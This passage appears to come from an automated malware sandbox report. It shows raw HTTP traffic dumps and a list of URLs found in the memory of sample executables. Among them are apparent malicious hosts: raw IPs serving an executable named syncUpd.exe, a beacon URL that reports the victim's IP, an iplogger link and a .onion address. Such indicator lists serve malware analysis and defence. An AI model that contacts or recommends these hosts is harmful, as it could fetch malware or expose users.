68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 b0 c9 4e f1 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff a7 d7 e4 d3 08 7b 4d 8a a4 75 b4 63 3d 54 21 6f 40 51 f8 43 8b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 62 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 df a7 a4 ca 71 83 e8 b9 5f 65 22 18 2f 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 c0 a2 ca e8 b1 55 84 3a a6 bb 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 0e bb e0 47 e4 dc 09 53 e2 f9 de 87 b4 43 d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 6f c2 75 6e fd 29 2a 93 dc 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 d8 5f 6b 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 f2 84 2d 6e 20 35 03 8d e4 24 bd 70 09 3c 3f 43 1e a8 cb cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 0f 01 75 30 4a fe 6b 72 f2 7f b1 0c 73 2b 04 20 6d 42 fd 7a 5d 7a 07 c1 70 dc 66 57 ec fe db d3 cd b1 25 14 9a ee b3 2a 5e 34 51 79 48 ab c4 13 0f e4 4f 26 2a a0 6d 63 2b 4a 73 99 a4 bd 3c 99 0e c9 9c 0b 48 16 13 47 6d b8 76 a0 a6 c0 f1 59 3a b9 46 27 f2 81 da 70 1a 04 19 e5 4c 42 2b fc a0 74 54 f6 04 f8 11 b3 b4 26 c8 b9 27 9c c2 3c 25 59 45 6e d4 49 a6 38 9d c1 5f 05 46 02 35 ad e9 ce 1a 50 46 23 f1 02 ec a4 85 5a 84 40 ab 74 3d 58 4e 75 ee d9 4a 68 1b 03 79 fe ee 2e be bc 68 6a 69 6e 5d 61 03 e2 73 97 6a a9 8e 75 11 68 45 a0 f5 0f f1 e5 85 93 14 ad 8b e8 bb cd 2e 72 c8 f2 8b 55 ff e1 01 48 85 90 1f cf 06 e6 08 7c c1 93 45 83 0e ed e6 c7 8f 60 76 ab 39 18 b2 27 55 72 94 81 c2 55 dc 94 38 db cd 4d ca 84 e2 89 a7 b9 fa ca f1 e0 bf 3e 3c d6 34 47 b8 3a 32 a2 6f 14 7f 4e 0a 9c 60 55 0a 55 98 cc ee 75 90 97 b5 5d 7d 61 3b 4a 82 2b ee cc 67 d3 5b 12 03 14 46 aa 95 f0 bf 81 65 18 30 92 4d fd 61 05 e2 37 36 e8 a6 d0 de 0e e8 a2 a9 3a 7c ab 40 5a 31 b9 89 fd fb a7 be 0f 74 7f fd eb 7e f6 da 8f 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 31 32 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 b4 e4 1e f1 71 b5 c9 bc 04 15 e7 71 ea fd 5e 47 9c 85 0a b5 90 0a 31 46 20 71 e6 60 28 43 15 b9 5b b0 be 11 c5 a2 b5 e9 95 49 96 7d 37 66 91 a5 18 ad 84 96 10 82 8f 87 f9 a1 70 1c 4e 1a b3 0d 8e e5 c9 cb 67 a6 38 01 e8 2c ca 4d c0 d4 6f 76 bf 44 f4 ca 7e 45 bf a3 f1 d7 ed 21 9f 72 57 44 6e 22 a6 24 4a 80 44 61 18 51 62 0c 6b 86 35 f0 e8 1b 7f 1f c4 d0 63 1a f8 bc 40 de dc fb 5d 56 bf e2 a7 ca 76 82 ed b9 0b 55 ad 7d ef 4a 94 8d 8b 73 9a cc 96 61 e4 97 cc c0 6f c9 41 d1 4b 2c ff 65 77 97 a3 a6 7b b2 fb 23 f5 92 37 df ad 86 78 58 91 77 1f b9 6d 53 69 d2 52 67 3a 87 75 20 6c f8 4c 46 f2 f8 3e 7e e2 a9 f3 b6 7c 90 41 c0 c6 a4 48 e5 bf eb 87 b0 6d 45 84 46 28 a2 19 bf 35 26 0f 18 c2 3b fd 11 df 00 1b bd 33 e6 3e 06 7b 72 f6 1d 12 7c 1b 4c 9b 83 c3 e9 aa 60 d1 08 b0 cc c9 e8 99 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 a1 93 f1 ba 18 3f 6f cd 63 43 79 fe be f6 e0 47 f8 fc 0a 53 e2 33 df 87 b4 a7 d4 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 c6 39 4c b9 4d e8 7b 76 24 25 fd 99 78 70 3e 94 63 61 6a c2 75 5c fc 29 1a 3c d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 d6 b8 13 a6 78 91 7d 02 8b 4f 69 3b 0e 94 03 b9 4a 4f 16 74 f9 ca 9e d2 be be 2c 6e 60 43 02 8d e7 24 bd 70 53 3e 3f 25 bc 6a ad ad cf bc a1 33 31 e7 df 1a 17 69 da db 96 84 46 a1 ff 94 21 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 a3 0b 2e 92 ca 56 7b 78 c5 89 8c 89 fd 15 73 30 50 76 6b 72 f2 4f 9d 0c 68 67 0f 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ac f4 d1 13 e3 c1 3e 7b f5 8d b7 0f 1c 31 51 79 48 6d bd 11 0f f0 4b d8 2c 05 6a 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 20 17 13 05 68 ef 37 e1 e8 ca fa 61 f4 6c 46 27 f5 ee d7 70 4b cd 15 e5 44 93 3b e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 7c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:59:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 2d 20 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 7- ]0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:59:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 2d 20 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 7- ]0

Source: etopt.exe, 0000001A.00000003.2432495292.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2432796920.0000000000611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.186.7.211:2001/
Source: etopt.exe, 0000001A.00000003.2432495292.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.186.7.211:2001/pwf
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/-core-win32k-fulluser-l1-1-0L
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/32k-minuser-l1-1-00
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000070C000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3184690905.00000000006EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exe
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000072E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeH
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000072E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeSystem32
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exehttps://iplogger.com/19bVA4SOFTWARE
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000072E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.64.35/syncUpd.exeo
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/ot%
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=212.102.41.2&substr=eight&s=abO
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=212.102.41.2&substr=eight&s=abe
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/?format=dfg/SILENTget1023
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.g
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: BroomSetup.exe, 00000010.00000000.2053792210.00000000008CD000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://fontawesome.io
Source: BroomSetup.exe, 00000010.00000000.2053792210.00000000008CD000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: BroomSetup.exe, 00000010.00000000.2053792210.00000000008CD000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://grub.org)Mozilla/5.0
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://invalidlog.txtlookup
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
Source: etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://news.qq.com
Source: etopt.exe, etopt.exe, 00000016.00000002.2053481217.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000002.2733876290.000000000040A000.00000004.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000000.2063286375.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000003.2731758306.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: InstallSetup8.exe, 0000000A.00000000.2030409331.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, InstallSetup8.exe, 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, InstallSetup8.exe, 0000000D.00000000.2033982367.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, etopt.exe, 00000016.00000002.2053481217.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000002.2733876290.000000000040A000.00000004.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000000.2063286375.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000003.2731758306.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttp://petas4zb2nd4xmyo2bozkq3g
Source: etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pz.hnlyzqjlb.com/mm2/up/http://pz.qishia.com/mm2/up/up2?sid=%u&d=pid=%u&mid=%u&sid=%u&x64=%u&
Source: explorer.exe, 00000001.00000000.1679072741.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1677857502.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1677485543.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
